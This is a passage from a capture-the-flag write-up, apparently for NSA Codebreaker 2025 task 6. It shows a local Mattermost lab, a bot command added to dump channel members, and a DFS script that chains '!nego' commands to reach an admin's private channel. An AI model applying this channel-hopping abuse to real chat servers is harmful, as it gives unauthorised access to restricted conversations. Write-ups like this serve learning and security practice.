(playbooks@localhost)oywfbkfe97d1mkyqx3ubsq4p5c: resolvedpoultry53 (resolvedpoultry53@malware.xyz)cby3we3cmtr33xdrs5twqok9jc: system-bot (system-bot@localhost)aua8kgt6yp878pct86oefoog8w: thriftyjerky58 (thriftyjerky58@malware.xyz)p6i8dfapjjrqudmz3qfuyk3mra: wrathfulfalcon8 (wrathfulfalcon8@malware.xyz)
There are 22 users on local instanceWhile we are at it, we also need to make a token for our bot to actually run. This can also be done with mmctl:
$ docker compose exec mattermost mmctl --local token generate malbot "bot api token"i6utw8yaytna9xz81sogmrxc6y: bot api tokenWe can put this token in the bot.py, and also fix the team name while we are at it:
bot = Bot( settings=Settings( MATTERMOST_URL = os.environ.get("MATTERMOST_URL", "http://127.0.0.1"), MATTERMOST_PORT = int(os.environ.get("MATTERMOST_PORT", 8065)), BOT_TOKEN = os.environ.get("BOT_TOKEN", "i6utw8yaytna9xz81sogmrxc6y"), BOT_TEAM = os.environ.get("BOT_TEAM", "malwarecentral"), SSL_VERIFY = os.environ.get("SSL_VERIFY", "False") == "True", RESPOND_CHANNEL_HELP=True, ), plugins=[SalesPlugin(), HelpPlugin(), OnboardingPlugin(),ManageChannelPlugin(),AdminPlugin()],)Now back to the nego command. As part of our requirements, we need to ensure that users we provide are not members of the target channel, so we need some way to dump the users of a given channel. However, as it turns out, there is no such way to do so with mmctl!
But I didn’t want to bother figuring out how to use the API directly, so I just hijacked the bot to add a command that would dump the members of a given channel for me. I added the following command to plugin_sales.py:
@listen_to("^!list_users (.*)$", no_direct=True, human_description="!list_users\n\tList all users in the given channel(s).")def list_users_cmd(self, message: Message, *args): logger.debug(f"list_users_cmd called with message: {message.text}") args = message.text.strip().split() if len(args) < 2: self.driver.reply_to(message, "Usage: !list_users channel_name [channel_name ...]") logger.warning("list_users_cmd: Incorrect number of arguments") return _, *channel_names = args for channel_name in channel_names: team_name = self.driver.options.get('team', 'malwarecentral') team = self.driver.teams.get_team_by_name(team_name) team_id = team.get('id') if isinstance(team, dict) else team.json().get('id') channel = self.driver.channels.get_channel_by_name(team_id, channel_name) if not channel: self.driver.reply_to(message, f"Channel '{channel_name}' not found.") logger.warning(f"list_users_cmd: Channel '{channel_name}' not found.") return channel_id = channel.get('id') if isinstance(channel, dict) else channel.json().get('id') members = self.driver.channels.get_channel_members(channel_id) user_list = [] for member in members: user_id = member.get('user_id') user = self.driver.users.get_user(user_id) username = user.get('username') if isinstance(user, dict) else user.json().get('username') user_list.append(username) self.driver.reply_to(message, f"Users in channel '{channel_name}':\n{user_list}") logger.info(f"list_users_cmd: Listed users in channel '{channel_name}'")Now we simply take all the channel names we dumped earlier, and run the command on all of them. Then we wait for the bot to do the work for us, and extract the usernames from the replies:
# for some reason other versions may be a bit unstable, blame pythonuv venv -p python3.12source .venv/bin/activateuv pip install mmpy_bot loguru dotenvpython3 bot.py
This gives us a final list of channels and their users:
'public':['mod_murkygatorade10', 'emptyshads41', 'cruelbass14', 'bubblyowl66', 'giddythrushe28', 'cautiousferret5', 'malbot', 'resolvedpoultry53', 'insecurebasmati34']
'channel14210':['mod_wingedlion39', 'mod_ecstaticcheese60', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_affectedeagle51', 'morbidcoconut10', 'alertfish82', 'resolvedpoultry53', 'mod_murkygatorade10', 'malbot', 'bubblyowl66', 'wrathfulfalcon8', 'cruelbass14', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel15769':['insecurebasmati34', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'morbidcoconut10', 'alertfish82', 'giddythrushe28', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'cruelbass14', 'mod_euphoriccoati77']
'channel23011':['giddythrushe28', 'wrathfulfalcon8', 'insecurebasmati34', 'resolvedpoultry53', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'mod_affectedeagle51', 'morbidcoconut10', 'emptyshads41', 'alertfish82', 'bubblyowl66', 'mod_euphoriccoati77', 'malbot']
'channel28375':['bubblyowl66', 'cruelbass14', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'mod_murkygatorade10', 'mod_wingedlion39', 'mod_affectedeagle51', 'emptyshads41', 'giddythrushe28', 'resolvedpoultry53', 'wrathfulfalcon8', 'malbot', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel36984':['thriftyjerky58', 'mod_affectedeagle51', 'morbidcoconut10', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'mod_ecstaticcheese60', 'emptyshads41', 'alertfish82', 'giddythrushe28', 'resolvedpoultry53', 'cruelbass14', 'malbot', 'bubblyowl66', 'wrathfulfalcon8', 'mod_murkygatorade10']
'channel37915':['mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'morbidcoconut10', 'emptyshads41', 'alertfish82', 'giddythrushe28', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'cruelbass14', 'insecurebasmati34']
'channel41964':['mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_affectedeagle51', 'morbidcoconut10', 'emptyshads41', 'bubblyowl66', 'resolvedpoultry53', 'mod_euphoriccoati77', 'alertfish82', 'malbot', 'mod_ecstaticcheese60', 'giddythrushe28', 'wrathfulfalcon8', 'mod_murkygatorade10']
'channel42011':['mod_wingedlion39', 'thriftyjerky58', 'mod_ecstaticcheese60', 'emptyshads41', 'bubblyowl66', 'mod_murkygatorade10', 'mod_euphoriccoati77', 'mod_aboardhoopoe59', 'giddythrushe28', 'resolvedpoultry53', 'wrathfulfalcon8', 'admin_zestysnail91', 'insecurebasmati34', 'malbot', 'cruelbass14']
'channel43502':['mod_wingedlion39', 'mod_aboardhoopoe59', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'emptyshads41', 'alertfish82', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'mod_murkygatorade10', 'cruelbass14']
'channel45015':['mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'morbidcoconut10', 'emptyshads41', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'cruelbass14', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel46360':['mod_aboardhoopoe59', 'morbidcoconut10', 'mod_wingedlion39', 'mod_ecstaticcheese60', 'mod_affectedeagle51', 'emptyshads41', 'bubblyowl66', 'giddythrushe28', 'mod_murkygatorade10', 'insecurebasmati34', 'malbot', 'cruelbass14', 'alertfish82', 'wrathfulfalcon8', 'mod_euphoriccoati77']
'channel51816':['mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'morbidcoconut10', 'emptyshads41', 'alertfish82', 'bubblyowl66', 'giddythrushe28', 'wrathfulfalcon8', 'cruelbass14', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel56398':['mod_aboardhoopoe59', 'mod_ecstaticcheese60', 'emptyshads41', 'cruelbass14', 'alertfish82', 'bubblyowl66', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'malbot', 'thriftyjerky58', 'mod_affectedeagle51', 'giddythrushe28', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel60311':['alertfish82', 'mod_aboardhoopoe59', 'emptyshads41', 'bubblyowl66', 'giddythrushe28', 'mod_euphoriccoati77', 'insecurebasmati34', 'malbot', 'mod_wingedlion39', 'mod_affectedeagle51', 'morbidcoconut10', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'cruelbass14']
'channel60871':['cruelbass14', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'morbidcoconut10', 'alertfish82', 'bubblyowl66', 'malbot', 'giddythrushe28', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel6153':['mod_affectedeagle51', 'morbidcoconut10', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'emptyshads41', 'alertfish82', 'bubblyowl66', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel62240':['wrathfulfalcon8', 'mod_affectedeagle51', 'mod_euphoriccoati77', 'emptyshads41', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'malbot', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'mod_ecstaticcheese60']
'channel62739':['mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'morbidcoconut10', 'emptyshads41', 'alertfish82', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'mod_murkygatorade10', 'cruelbass14', 'mod_euphoriccoati77']
'channel64089':['mod_euphoriccoati77', 'insecurebasmati34', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'emptyshads41', 'alertfish82', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'cruelbass14']
'channel76379':['mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'morbidcoconut10', 'emptyshads41', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'mod_murkygatorade10', 'cruelbass14', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel77848':['mod_wingedlion39', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'morbidcoconut10', 'emptyshads41', 'alertfish82', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'mod_murkygatorade10', 'cruelbass14', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel78377':['emptyshads41', 'mod_affectedeagle51', 'mod_ecstaticcheese60', 'mod_wingedlion39', 'insecurebasmati34', 'cruelbass14', 'malbot', 'morbidcoconut10', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'mod_murkygatorade10', 'mod_euphoriccoati77']
'channel91739':['alertfish82', 'mod_euphoriccoati77', 'morbidcoconut10', 'emptyshads41', 'giddythrushe28', 'wrathfulfalcon8', 'mod_murkygatorade10', 'cruelbass14', 'insecurebasmati34', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51']Given that the user admin_zestysnail91 only exists in one channel, and they are the only admin in the instance, that is probably our goal adversary that we need to reach, meaning we somehow need to reach channel42011 using only nego commands.
The final stretch
To find a valid path, we can write a quick DFS script that will check all the channels reachable from every channel we can access, until we find one that contains admin_zestysnail91.
users = ['admin_zestysnail91', 'alertfish82', 'bubblyowl66', 'calls', 'cautiousferret5', 'cruelbass14', 'emptyshads41', 'giddythrushe28', 'insecurebasmati34', 'malbot', 'mod_aboardhoopoe59', 'mod_affectedeagle51', 'mod_ecstaticcheese60', 'mod_euphoriccoati77', 'mod_murkygatorade10', 'mod_wingedlion39', 'morbidcoconut10', 'playbooks', 'resolvedpoultry53', 'system', 'thriftyjerky58', 'wrathfulfalcon8']
channels = open('channels.txt').read().split('\n\n')channels = { channel.split('\n')[0][1:-2]: eval(channel.split('\n')[1]) for channel in channels}
ME = 'cautiousferret5'start = 'public'end = 'channel42011'
def find_members(channel_a, channel_b): # return a group of members that we can use to move from channel_a to channel_b usable_members = set(channels[channel_a]) - set(channels[channel_b]) if ME not in usable_members: return None usable_members.remove(ME)
mods = [user for user in usable_members if user.startswith('mod_')] if len(mods) < 1: return None mod = mods[0]
non_mods = [user for user in usable_members if not user.startswith('mod_')] if len(non_mods) < 2: return None return [ME] + non_mods[:2] + [mod]
def dfs(current, path): print(f'At {current}, path {path}') for channel in channels: members = find_members(current, channel) if not members: continue
if channel == end: return path + [(channel, members)] result = dfs(channel, path + [(channel, members)]) if result: return result return None
path = dfs(start, [(start, [])])for channel, members in path[1:]: print(f'!nego {channel} ' + ' '.join(members[1:]))However, if we run this script, we don’t get anything…
$ python3 solve_1.pyAt public, path [('public', [])]At channel62240, path [('public', []), ('channel62240', ['cautiousferret5', 'insecurebasmati34', 'cruelbass14', 'mod_murkygatorade10'])]Traceback (most recent call last): File "/mnt/c/Users/flocto/Documents/Cybersecurity/2025/NSACodebreaker/task6/writeup/solve_1.py", line 44, in <module> for channel, members in path:TypeError: 'NoneType' object is not iterableI was stuck here for a while until I realized I had overlooked one thing: once we add ourselves to a channel using the !nego command, we bring all the users in the command with us! Then, we can use those users to further move into other channels.
Patching the script to account for that, we get the following final version:
28 collapsed lines
users = ['admin_zestysnail91', 'alertfish82', 'bubblyowl66', 'calls', 'cautiousferret5', 'cruelbass14', 'emptyshads41', 'giddythrushe28', 'insecurebasmati34', 'malbot', 'mod_aboardhoopoe59', 'mod_affectedeagle51', 'mod_ecstaticcheese60', 'mod_euphoriccoati77', 'mod_murkygatorade10', 'mod_wingedlion39', 'morbidcoconut10', 'playbooks', 'resolvedpoultry53', 'system', 'thriftyjerky58', 'wrathfulfalcon8']
channels = open('channels.txt').read().split('\n\n')channels = { channel.split('\n')[0][1:-2]: eval(channel.split('\n')[1]) for channel in channels}
ME = 'cautiousferret5'start = 'public'end = 'channel42011'
def find_members(channel_a, channel_b): # return a group of members that we can use to move from channel_a to channel_b usable_members = set(channels[channel_a]) - set(channels[channel_b]) if ME not in usable_members: return None usable_members.remove(ME)
mods = [user for user in usable_members if user.startswith('mod_')] if len(mods) < 1: return None mod = mods[0]
non_mods = [user for user in usable_members if not user.startswith('mod_')] if len(non_mods) < 2: return None return [ME] + non_mods[:2] + [mod]
def dfs(current, path): print(f'At {current}, path {path}') for channel in channels: members = find_members(current, channel) if not members: continue
if channel == end: return path + [(channel, members)] channels[channel].extend(members) # add all members to the channel result = dfs(channel, path + [(channel, members)]) if result: return result return None
path = dfs(start, [(start, [])])for channel, members in path[1:]: print(f'!nego {channel} ' + ' '.join(members[1:]))This gives us:
$ python3 solve_1.pyAt public, path [('public', [])]At channel62240, path [('public', []), ('channel62240', ['cautiousferret5', 'cruelbass14', 'insecurebasmati34', 'mod_murkygatorade10'])]At channel43502, path [('public', []), ('channel62240', ['cautiousferret5', 'cruelbass14', 'insecurebasmati34', 'mod_murkygatorade10']), ('channel43502', ['cautiousferret5', 'wrathfulfalcon8', 'insecurebasmati34', 'mod_euphoriccoati77'])]At channel78377, path [('public', []), ('channel62240', ['cautiousferret5', 'cruelbass14', 'insecurebasmati34', 'mod_murkygatorade10']), ('channel43502', ['cautiousferret5', 'wrathfulfalcon8', 'insecurebasmati34', 'mod_euphoriccoati77']), ('channel78377', ['cautiousferret5', 'alertfish82', 'wrathfulfalcon8', 'mod_aboardhoopoe59'])]!nego channel62240 cruelbass14 insecurebasmati34 mod_murkygatorade10!nego channel43502 wrathfulfalcon8 insecurebasmati34 mod_euphoriccoati77!nego channel78377 alertfish82 wrathfulfalcon8 mod_aboardhoopoe59!nego channel42011 alertfish82 morbidcoconut10 mod_affectedeagle51We can run these commands one by one in Mattermost, and finally we get access to channel42011, where admin_zestysnail91 resides!

Submitting the list of commands, we successfully finish task 6.